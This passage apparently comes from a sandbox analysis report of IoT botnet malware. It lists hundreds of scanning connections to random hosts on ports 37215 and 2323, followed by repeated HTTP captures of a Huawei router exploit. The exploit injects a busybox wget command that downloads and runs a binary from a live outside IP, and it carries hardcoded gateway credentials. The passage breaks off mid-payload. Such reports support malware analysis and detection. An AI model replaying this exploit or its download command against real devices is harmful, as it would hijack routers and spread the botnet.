              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 197.198.93.203:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 197.103.214.127:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 197.92.103.249:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 197.12.242.119:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 197.106.99.64:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 197.164.54.175:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 197.188.94.238:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 197.212.80.147:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 197.227.132.248:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 197.118.211.230:37215
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 117.98.210.201:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 72.116.124.156:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 4.55.32.72:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 74.134.70.158:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 206.33.207.49:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 42.125.239.213:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 65.87.165.171:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 40.177.232.36:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 148.90.71.106:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 134.165.28.250:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 44.231.255.67:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 142.81.87.53:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 121.137.60.213:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 163.97.74.225:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 173.227.118.45:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 119.94.32.19:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 197.219.65.214:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 8.145.130.203:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 58.225.0.205:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 158.77.161.33:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 74.239.188.74:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 151.165.194.204:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 131.102.97.100:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 106.217.99.232:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 160.149.65.237:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 141.199.146.3:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 24.241.102.16:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 201.198.137.53:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 208.154.146.119:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 223.223.53.244:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 81.67.117.207:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 166.189.75.7:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 35.117.33.177:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 17.209.110.178:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 85.41.126.229:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 120.59.167.66:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 169.106.165.99:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 12.224.31.45:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 45.244.135.157:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 94.227.225.41:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 14.92.179.145:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 63.105.192.175:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 19.78.249.187:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 75.244.81.210:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 208.203.170.149:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 129.8.72.178:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 106.140.136.66:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 194.23.32.91:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 112.51.177.140:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 9.207.110.46:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 18.212.142.195:2323
              Source: global trafficTCP traffic: 192.168.2.14:9578 -> 165.45.168.160:2323
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.31.186.254:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.252.40.234:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.204.83.96:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.90.222.191:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.136.130.248:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.64.170.145:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.57.152.216:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.96.156.93:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.232.65.55:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.243.197.154:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.50.87.10:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.221.152.68:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.96.207.207:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.239.12.179:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.163.139.154:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.161.177.129:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.59.76.11:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.187.174.129:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.82.118.69:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.13.143.199:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.43.67.78:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.199.189.140:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.250.237.241:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.246.189.2:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.106.152.247:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.110.234.145:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.134.149.128:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.108.87.154:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.162.29.77:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.213.193.128:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.254.188.53:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.60.94.219:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.106.1.82:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.14.68.110:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.191.240.228:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.156.74.218:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.6.58.245:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.125.219.69:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.42.55.114:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.89.131.196:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.101.198.129:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.115.182.103:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.174.208.227:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.242.24.142:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.133.88.222:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.197.149.244:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.59.72.175:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.29.97.206:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.191.159.173:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.195.75.211:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.53.116.200:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.152.180.93:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.137.176.171:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.172.185.41:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.245.1.204:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.249.115.158:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.234.250.27:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.222.187.155:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.66.219.181:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.212.127.76:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.238.1.185:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.80.217.155:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.251.242.44:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.4.144.254:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.16.241.41:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.227.90.210:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.238.48.27:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.75.37.190:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.13.229.185:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.4.238.160:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.93.153.241:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.84.235.35:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.108.226.127:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.214.249.81:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.242.63.23:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.120.246.232:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.195.203.225:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.139.127.210:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.122.12.25:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.66.220.163:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.225.216.203:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.1.254.247:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.233.116.224:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.121.16.233:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.180.175.27:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.64.137.179:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.255.190.87:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.151.135.249:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.221.169.193:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.159.188.188:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.195.184.243:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.84.86.94:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.182.208.150:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.249.131.165:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.0.237.103:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.37.204.217:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.41.96.252:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.238.236.201:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.14.173.83:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.202.174.187:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.110.103.210:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.176.193.131:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.237.115.211:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.48.4.27:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.167.125.197:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.8.52.246:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.159.20.51:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.19.71.105:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.94.148.230:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.25.118.246:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.241.236.168:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.247.3.151:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.30.6.247:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.99.108.20:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.216.254.177:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.55.148.233:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.102.171.246:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.72.218.242:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.34.98.172:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.11.131.220:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.93.111.92:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.122.93.219:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.142.183.82:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.177.80.163:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.181.218.182:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.251.173.213:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.35.184.62:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.26.48.158:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.69.135.125:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.140.163.108:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.244.218.187:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.236.175.121:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.12.34.86:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.120.10.149:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.234.229.163:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.126.165.91:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.22.252.249:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.172.196.254:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.133.45.161:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.211.113.190:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.164.60.58:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.122.27.197:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.131.35.239:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.94.218.152:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.35.174.105:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.132.209.169:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.94.128.0:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.21.226.224:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.30.138.166:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.142.123.25:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.71.70.190:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.223.207.153:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.3.98.94:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.62.5.85:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.108.203.202:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.40.216.134:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.244.205.73:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.30.11.31:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.180.149.107:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.1.58.187:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.0.205.17:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.36.100.53:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.53.225.150:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.140.39.241:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.156.87.146:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.6.244.12:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.163.128.60:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.142.102.131:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.83.8.85:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.198.163.170:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.146.127.167:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.25.1.123:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.152.130.211:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.187.2.56:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.159.230.84:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.241.130.62:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.63.88.100:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.75.82.84:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.149.31.62:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.142.13.193:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.74.120.148:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.241.143.0:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.18.106.152:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.2.161.135:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.161.102.21:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.47.41.171:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.55.83.79:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.47.17.227:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.222.28.61:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.4.158.194:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.123.145.247:37215
              Source: global trafficTCP traffic: 192.168.2.14:9580 -> 156.201.27.213:37215
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo 